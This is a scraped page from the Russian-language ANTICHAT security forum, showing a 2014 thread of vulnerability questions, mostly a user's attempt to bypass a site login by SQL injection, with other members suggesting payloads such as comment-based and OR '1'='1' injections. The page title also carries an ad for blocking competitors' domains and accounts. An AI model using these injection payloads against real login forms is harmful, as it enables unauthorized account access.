УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2386 из 2438

2386

Опции темы

Поиск в этой теме

Опции просмотра

#23851

01.11.2014, 12:35

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от GAiN

GAiN said:
чем же можно зашифровать данные поступающие в базу ?
кроме пароля открытые остаются email - они же логины, телефоны, номера карт например
и нужно что бы эти данные из базы могла расшифровать только функция в скрипте принимающая и обрабатывающая данные. данные хранятся в шифрованом виде

например mcrypt .

#23852

01.11.2014, 23:01

GAiN

Guest

Сообщений: n/a

Провел на форуме:
755326

Репутация: 99

возможно ли зашифровать передачу скрытого ssid для wifi точки, что бы его нельзя было перехватить ? шифрование точки: WPA-PSK/WPA2-PSK

зашифровать так же как и пароль wifi точки !

#23853

04.11.2014, 19:28

Han

Guest

Сообщений: n/a

Провел на форуме:
5507

Репутация: 0

Создаю пост запрос:

login=Admin'+--+\&pass=123

Слэш вызывает ошибку:

WHERE `login` = 'Admin' -- \' AND `password` = '202cb962ac59075b964b07152d234b70' LIMIT 1

Слэш убираю, а авторизация не проходит. Ощущение, что ' -- ' не комментирует. Пробовал /* в ответной ошибке остается только *. Подскажите что еще можно попробовать?

P.S.

Цитата:

Сообщение от Br@!ns

Br@!ns said:
# например еще

Пробовал.(

#23854

04.11.2014, 20:50

Br@!ns

Guest

Сообщений: n/a

Провел на форуме:
179197

Репутация: 25

Цитата:

Сообщение от Han

Han said:
Создаю пост запрос:
login=Admin'+--+\&pass=123
Слэш вызывает ошибку:
WHERE `login` = 'Admin' -- \' AND `password` = '202cb962ac59075b964b07152d234b70' LIMIT 1
Слэш убираю, а авторизация не проходит. Ощущение, что ' -- ' не комментирует. Пробовал /* в ответной ошибке остается только *. Подскажите что еще можно попробовать?

# например еще

#23855

04.11.2014, 23:56

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от Han

пробовали с комбинацией OR? http://www.securityidiots.com/Web-Pe...injection.html

#23856

05.11.2014, 00:22

Han

Guest

Сообщений: n/a

Провел на форуме:
5507

Репутация: 0

Цитата:

Сообщение от faza02

faza02 said:
пробовали с комбинацией OR?
http://www.securityidiots.com/Web-Pe...injection.html

Пробовал. Запрос выполняется, но вход не происходит.

#23857

05.11.2014, 10:36

KIR@PRO

Постоянный

Регистрация: 26.12.2007

Сообщений: 353

Провел на форуме:
905389

Репутация: 332

Отправить сообщение для KIR@PRO с помощью ICQ

Цитата:

Сообщение от Han

Код:

Code:
login=Admin'+or+login+='bad_login_name&pass=any

bad_login_name - любой логин кроме необходимого, к которому не подходит пасс any

#23858

05.11.2014, 19:17

Han

Guest

Сообщений: n/a

Провел на форуме:
5507

Репутация: 0

Цитата:

Сообщение от KIR@PRO

KIR@PRO said:

Код:

Code:
login=Admin'+or+login+='bad_login_name&pass=any

bad_login_name
- любой логин кроме необходимого, к которому не подходит пасс
any

Не помогло.

В исходном коде введенные мною кавычки выглядят как & # 039; только без пробела. Это играет роль?

#23859

05.11.2014, 19:37

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от Han

Han said:
Не помогло.
В исходном коде введенные мною кавычки выглядят как '. Это играет роль?

кавычки не экранируются и не фильтруются. попробуйте

Код:

Code:
SELECT * FROM users WHERE `login` = 'Admin' AND `password` = '1' OR '1'='1' --

это равносильно запросу

Код:

Code:
SELECT * FROM users WHERE login='Admin' AND TRUE

поэтому будет выборка из таблицы, где значение колонки login == Admin.

#23860

05.11.2014, 20:00

KIR@PRO

Постоянный

Регистрация: 26.12.2007

Сообщений: 353

Провел на форуме:
905389

Репутация: 332

Цитата:

Сообщение от Han

Han said:
Не помогло.
В исходном коде введенные мною кавычки выглядят как & # 039; . Это играет роль?

да, это фильтрация.... там походу только слеш не фильтруется

Страница 2386 из 2438

2386

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход